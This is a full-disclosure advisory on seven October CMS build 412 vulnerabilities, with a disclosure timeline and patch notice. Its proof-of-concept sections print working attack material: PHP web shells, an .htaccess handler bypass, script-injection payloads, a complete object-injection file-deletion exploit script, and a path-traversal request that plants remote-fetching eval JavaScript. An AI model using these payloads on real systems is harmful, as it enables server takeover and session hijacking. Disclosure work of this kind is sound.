October CMS v1.0.412 several vulnerabilities
############################################


Information
===========

Name:          October CMS v1.0.412 (build 412)
Homepage:      http://octobercms.com
Vulnerability: several issues, including PHP code execution
Prerequisites: attacker has to be authenticated user with media or asset
               management permission
CVE:           pending

Credit:        Anti RA$?is
HTML version:  https://bitflipper.eu


Product
=======

October is a free, open-source, self-hosted CMS platform based on the
Laravel
PHP Framework.


Description
===========

October CMS build 412 contains several vulnerabilities. Some of them
allow an
attacker to execute PHP code on the server. Following issues have been
identified:

    1. PHP upload protection bypass
    2. Apache .htaccess upload
    3. stored WCI in image name
    4. reflected WCI while displaying project ID
    5. PHP code execution via asset management
    6. delete file via PHP object injection
    7. asset save path modification


Proof of Concepts
=================

1. PHP upload protection bypass
-------------------------------

Authenticated user with permission to upload and manage media contents can
upload various files on the server. Application prevents the user from
uploading PHP code by checking the file extension. It uses black-list based
approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
Definitions.php:blockedExtensions().

==================== source start ========================
106 <?php
107 protected function blockedExtensions()
108 {
109         return [
110                 // redacted
111                 'php',
112                 'php3',
113                 'php4',
114                 'phtml',
115                 // redacted
116         ];
117 }
====================  source end  ========================

We can easily bypass file upload restriction on those systems by using an
alternative extension, e.g if we upload sh.php5 on the server:

==================== source start ========================
<?php $_REQUEST['x']($_REQUEST['c']);
====================  source end  ========================

Code can be execute by making a following request:
http://victim.site/storage/app/media/sh.php5?x=system&c=pwd

2. Apache .htaccess upload
--------------------------

As described in the PHP upload protection bypass section, the
application uses
black-list based defense. It does not prevent the attacker from uploading a
.htaccess files which makes it exploitable on Apache servers. Attacker
can use
it to add another handler for PHP files and upload code under an alternative
name. Attacker has to first upload the .htaccess configuration file with
following settings:

==================== source start ========================
AddHandler application/x-httpd-php .z
====================  source end  ========================

This will execute all .z files as PHP and after uploading a code named
sh.z to
the server. It can be used to execute code as described previously.

3. stored WCI in image name
---------------------------

Authenticated user, with permission to customize back-end settings, can
store
WCI payload in the image name. The functionality is located at:

	Settings -> Customize Back-end -> Brand Logo -> (upload logo) ->
	(edit name) -> (add title)

Set the name to following value:

==================== source start ========================
"><script>alert("stored WCI")</script x="
====================  source end  ========================

Payload is executed when the victim clicks on the image name to edit it.

When the administrator edits user's profile image, attacker's payload is
executed, allowing him to execute JavaScript during administrator's active
session. This can be used, for example, to give another user a "super-user"
permission.

4. reflected WCI while displaying project ID
--------------------------------------------

Authenticated user with permission to manage software updates can "Attach
Project". When invalid value is provided, the error message doesn't properly
escape the given value, which allows an attacker to execute code. Since it
requires the victim to paste or write the payload in the input field,
then it
isn't easily exploitable.

==================== source start ========================
"><script>alert(1)</script x="
====================  source end  ========================

5. PHP code execution via asset management
------------------------------------------

Authenticated user with permission to manage website assets, can use this
functionality to upload PHP code and execute it on the server.

Asset management URL: http://victim.site/backend/cms.
Functionality is located at: CMS -> Assets -> Add -> Create file.

First, attacker creates a new asset test.js with the following content:

==================== source start ========================
<pre><?php if(isset($_REQUEST['x'])){echo system($_REQUEST['x']);}?></pre>
====================  source end  ========================

After saving the file, attacker renames it to test.php5 by clicking on ">_"
icon on the newly created file. Modal window opens which allows to specify a
new filename.

URL to execute PHP code:
http://victim.site/themes/demo/assets/test.php5?x=ls%20-lah

6. delete file via PHP object injection
---------------------------------------

Authenticated user with "Create, modify and delete CMS partials" or "Create,
modify and delete CMS layouts" can move assets to different folders. This
functionality is vulnerable to PHP object injection. User input is read from
selectedList parameter on line 11 and passed as argument to unserialize().
Unserialized array object is passed to validatePath() on line 32.

==================== source start ========================
 1 <?php namespace Cms\Widgets;
 2
 3 class AssetList extends WidgetBase
 4 {
 5     // redacted
 6
 7     public function onMove()
 8     {
 9         $this->validateRequestTheme();
10
11         $selectedList = Input::get('selectedList');
12         if (!strlen($selectedList)) {
13             throw new ApplicationException(
                   Lang::get('cms::lang.asset.selected_files_not_found'));
14         }
15
16         $destinationDir = Input::get('dest');
17         if (!strlen($destinationDir)) {
18             throw new ApplicationException(
                   Lang::get('cms::lang.asset.select_destination_dir'));
19         }
20
21         $destinationFullPath = $this->getFullPath($destinationDir);
22         if (!file_exists($destinationFullPath) ||
               !is_dir($destinationFullPath)) {
23             throw new ApplicationException(
                   Lang::get('cms::lang.asset.destination_not_found'));
24         }
25
26         $list = @unserialize(@base64_decode($selectedList));
27         if ($list === false) {
28             throw new ApplicationException(
                   Lang::get('cms::lang.asset.selected_files_not_found'));
29         }
30
31         foreach ($list as $path) {
32             if (!$this->validatePath($path)) {
33                 throw new ApplicationException(
                       Lang::get('cms::lang.asset.invalid_path'));
34             }
35
36     // ...
====================  source end  ========================

Following PHP exploit uses the vulnerability. It requires an authenticated
user's session to execute as described previously.

==================== source start ========================
<?php

class Swift_Mime_SimpleHeaderSet {}

class Swift_KeyCache_DiskKeyCache
{
    private $_keys;

    public function __construct($path, $filename) {
        $this->_keys = [$path => [ $filename => null]];
    }
}

class Swift_Mime_SimpleMimeEntity {
        private $_headers;
        private $_cache;
        private $_cacheKey;

        public function __construct($filename, $path = '') {
                $this->_headers = new Swift_Mime_SimpleHeaderSet();
                $this->_cache = new Swift_KeyCache_DiskKeyCache($path,
                    $filename);
                $this->_cacheKey = $path;
        }
}

function payload($filename) {
        $builder = new Swift_Mime_SimpleMimeEntity($filename);
        return base64_encode(serialize([$builder]));
}

function http($config) {
        $ch = curl_init($config['url']);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS,
            http_build_query($config['data']));
        curl_setopt($ch, CURLOPT_HTTPHEADER, $config['headers']);
        curl_setopt($ch, CURLOPT_COOKIE, $config['cookies']);
        curl_setopt($ch, CURLOPT_PROXY, $config['proxy']);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        return curl_exec($ch);
}

function get_config($url, $filename, $session) {
        return [
                'url' => $url.'/backend/cms',
                'data' => [
                        'dest' => '/',
                        'theme' => 'demo',
                        'selectedList' => payload($filename),
                ],
                'headers' => [
                        'X-OCTOBER-REQUEST-HANDLER: assetList::onMove',
                        'X-Requested-With: XMLHttpRequest',
                ],
                'cookies' => 'admin_auth='.$session,
                'proxy' => 'localhost:8080',
        ];
}

$url = 'http://victim.site';
$session = '<specify admin_auth cookie value here>';
$filename = '/tmp/target.txt';

echo http(get_config($url, $filename, $session));
====================  source end  ========================

7. asset save path modification
-------------------------------

Authenticated user, with permission to manage website assets, can modify the
path the file is saved to. This allows an attacker to save css, js, less,
sass, scss files at different locations. Attacker can possibly use it to
execute JavaScript on the site, if the application tries to require an
file on
the server that does not exist or the attacker manages to delete the file
beforehand. When an attacker creates a new asset, then the following request
is made.

Asset management URL: http://victim.site/backend/cms.
Functionality is located at: CMS -> Assets -> Add -> Create file.

==================== request ========================
POST /backend/cms HTTP/1.1
Host: victim.site
Content-Length: 817
Content-Type: application/x-www-form-urlencoded
X-OCTOBER-REQUEST-HANDLER: onSave
X-Requested-With: XMLHttpRequest
Cookie: admin_auth=...;
Connection: close

fileName=test.js&content=test&templateType=asset&theme=demo
==================== request end ====================

The parameter fileName isn't validated and allows an attacker to specify an
path where the file should be saved to. Overwriting files is forbidden.
If we
specify the file name as ../../../test.js then we can assert that the
file is
created at the root of site's web directory.

We can execute JavaScript by combining this issue with file deletion
vulnerability via POI. For that, we are going to replace the
modules/backend/
assets/js/vendor/jquery.min.js file with our own content. It is loaded
on the
page for every authenticated user and allows us as an attacker to take
control
of their session. The payload for this example is the following:

==================== source start ========================
var c = new XMLHttpRequest();
c.open('GET', 'https://code.jquery.com/jquery-1.11.1.js', false);
c.onreadystatechange = () => eval(c.responseText);
c.send();
var h = () => {location.hash = 'Hacked: ' + (new Date())};
setInterval(h, 1000);
====================  source end  ========================

After we delete the jquery.min.js file on the server, we create a new asset
with the payload as the content.

==================== request ========================
POST /backend/cms HTTP/1.1
Host: victim.site
Content-Length: 371
Content-Type: application/x-www-form-urlencoded
X-OCTOBER-REQUEST-HANDLER: onSave
X-Requested-With: XMLHttpRequest
Cookie: admin_auth=...;
Connection: close

fileName=../../../modules/backend/assets/js/vendor/jquery.min.js&content=
var+c+%3d+new+XMLHttpRequest()%3b
c.open('GET',+'https%3a//code.jquery.com/jquery-1.11.1.js',+false)%3b
c.onreadystatechange+%3d+()+%3d>+eval(c.responseText)%3b
c.send()%3b
var+h+%3d+()+%3d>+{location.hash+%3d+'Hacked%3a+'+%2b+(new+Date())}%3b
setInterval(h,+1000)%3b
&templateType=asset&theme=demo
==================== request end ====================

After the victim authenticates, the payload is executed. For this
example, it
changes the URL hash every second, but can be used to take control of the
victims session.


Conclusion
==========

Authenticated user with permission to manage website assets, upload and
manage
media contents or customize back-end settings can use vulnerabilities found
there to execute PHP code on the server and take control of the application.

New release v1.0.413 has been made available as a result:

    https://octobercms.com/support/article/rn-8
    https://github.com/octobercms/october/releases/tag/v1.0.413.


Timeline
========

05.04.2017 | me > developer     | first vulnerability discovered
06.04.2017 | me > developer     | initial contact
07.04.2017 | me > developer     | sent PoC
09.04.2017 | developer > me     | developer implemented patches;
                                  requested additional information
09.04.2017 | me > developer     | sent PoC with additional information
                                  and findings
10.04.2017 | developer > me     | all issues were patched
11.04.2017 | developer > public | new release
11.04.2017 | me > DWF           | CVE request
12.04.2017 | me > public        | full disclosure

---
Anti RA$?is
Blog: https://bitflipper.eu
Pentester at http://www.clarifiedsecurity.com